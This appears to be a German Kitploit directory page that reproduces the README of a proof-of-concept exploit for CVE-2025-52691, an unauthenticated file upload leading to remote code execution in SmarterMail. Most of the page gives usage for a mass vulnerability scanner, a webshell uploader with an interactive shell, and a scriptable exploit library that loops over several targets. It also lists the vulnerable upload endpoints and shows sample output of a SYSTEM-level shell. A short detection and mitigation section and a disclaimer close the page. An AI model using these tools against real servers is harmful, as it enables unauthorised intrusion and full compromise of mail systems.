Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-52691-poc — Proof-of-Concept-Exploit für CVE-2025-52691: Unauthentifizierter beliebiger Dateiupload, der zu Remote-Codeausführung (RCE) in SmarterMail führt. Enthält einen Schwachstellenscanner, einen ASPX-Webshell-Uploader und eine interaktive Shell für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
SchwachstellenscannerPayload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
rimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Proof-of-Concept-Exploit für CVE-2025-52691: Unauthentifizierter beliebiger Dateiupload, der zu Remote-Codeausführung (RCE) in SmarterMail führt. Enthält einen Schwachstellenscanner, einen ASPX-Webshell-Uploader und eine interaktive Shell für autorisierte Sicherheitstests.

Repository anzeigen
3vor 7 MonatenNoch nicht geprüft

CVE-2025-52691 POC

Proof-of-Concept für CVE-2025-52691 – SmarterMail Unauthenticated Arbitrary File Upload RCE

⚠️ Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Unbefugter Zugriff ist illegal.

Übersicht

Kritische Schwachstelle in SmarterMail, die nicht authentifizierten Benutzern das Hochladen beliebiger Dateien durch Path Traversal ermöglicht, was zu Remote-Codeausführung führt.

Schwachstelle: Path Traversal in Upload-Endpunkten ermöglicht das Hochladen von ASPX-Webshells in das Webroot
Auswirkung: Nicht authentifizierte Remote-Codeausführung
Angriffsvektor: Netzwerk / Nicht authentifiziert

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Werkzeuge

check.py - Schwachstellenscanner

Scannt Ziele auf die Schwachstelle CVE-2025-52691. Speichert nur verwundbare URLs in der Ausgabedatei.

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

Ausgabe: Eine verwundbare URL pro Zeile in results.txt

pwn.py - Exploit-Werkzeug

Lädt eine ASPX-Webshell hoch und ermöglicht die Ausführung von Befehlen.

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - Python-Bibliothek

Wiederverwendbares Exploit-Modul zur Integration in eigene Skripte.

Als Bibliothek:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

Als eigenständiges Skript:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Technische Details

Verwundbare Endpunkte:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Exploitation-Methoden:

  • Multipart-Formular-Upload mit Path Traversal (../wwwroot/)
  • Raw-POST mit benutzerdefinierten Headern
  • JSON-Payload mit base64-kodiertem Inhalt

Webshell: Minimale ASPX-Shell, die Befehle über den Parameter ?cmd= entgegennimmt

Angriffsablauf

  1. Ziel scannen: python check.py <target>
  2. Exploit: python pwn.py <target> -i
  3. Befehle in der interaktiven Shell ausführen

Erkennung & Abhilfe

Erkennung:

  • Überwachen von ASPX-Datei-Uploads in Webverzeichnisse
  • Protokolle auf Path-Traversal-Muster (../) prüfen
  • Alarmieren bei unerwarteten /api/upload-Anfragen

Gegenmaßnahmen:

  • SmarterMail auf die neueste Version aktualisieren
  • Strenge Dateipfadvalidierung implementieren
  • WAF mit Upload-Filterung bereitstellen
  • Authentifizierung auf Upload-Endpunkten erzwingen

Beispiel

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Holen Sie vor dem Testen stets die entsprechende Genehmigung ein.

Tool herunterladen